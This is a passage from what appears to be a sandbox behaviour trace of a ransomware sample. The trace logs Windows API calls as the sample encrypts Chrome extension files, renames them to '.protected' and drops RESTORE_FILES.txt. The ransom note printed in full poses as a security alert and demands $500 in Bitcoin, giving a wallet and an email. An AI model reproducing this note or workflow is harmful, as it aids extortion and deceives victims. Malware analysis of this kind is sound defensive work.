(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.743] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.743] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.743] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.743] CloseHandle (hObject=0x164) returned 1 [0080.743] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.743] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0080.743] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0080.743] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0080.743] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0080.743] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0080.743] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi") returned 141 [0080.743] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0080.743] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0080.743] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\*") returned 143 [0080.743] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.744] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.744] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.744] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.744] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.744] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.744] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\.") returned 143 [0080.744] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.744] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.744] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.744] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.744] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.744] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.744] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.744] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\..") returned 144 [0080.744] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.744] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.744] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.744] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.744] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.744] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.744] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.744] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.744] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json") returned 155 [0080.744] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.744] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.744] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.744] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.745] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json") returned 155 [0080.745] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.745] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json") returned 155 [0080.745] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.745] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json") returned 155 [0080.745] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.745] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0080.745] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.746] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0080.746] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.746] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.746] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.746] CloseHandle (hObject=0x168) returned 1 [0080.746] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.protected") returned 165 [0080.746] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.protected")) returned 1 [0080.746] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.747] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.747] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\RESTORE_FILES.txt") returned 159 [0080.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.747] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.747] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.748] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.748] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.748] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.748] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.748] CloseHandle (hObject=0x164) returned 1 [0080.748] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.748] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0080.748] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0080.748] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0080.748] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0080.748] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0080.748] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN") returned 144 [0080.748] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0080.748] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0080.748] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\*") returned 146 [0080.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.749] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.749] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.749] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.749] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.749] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.749] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\.") returned 146 [0080.749] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.749] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.749] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.749] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.749] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.749] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.749] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.749] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\..") returned 147 [0080.749] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.749] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.749] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.749] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.749] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.749] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.749] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.749] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.749] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.750] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.750] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.750] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.750] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.750] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.750] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.750] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.750] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb0, lpOverlapped=0x0) returned 1 [0080.751] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.751] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb0, lpOverlapped=0x0) returned 1 [0080.751] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.751] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.751] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.751] CloseHandle (hObject=0x168) returned 1 [0080.751] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.protected") returned 168 [0080.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0080.752] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.752] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.752] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 162 [0080.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.752] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.752] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.753] lstrlenA 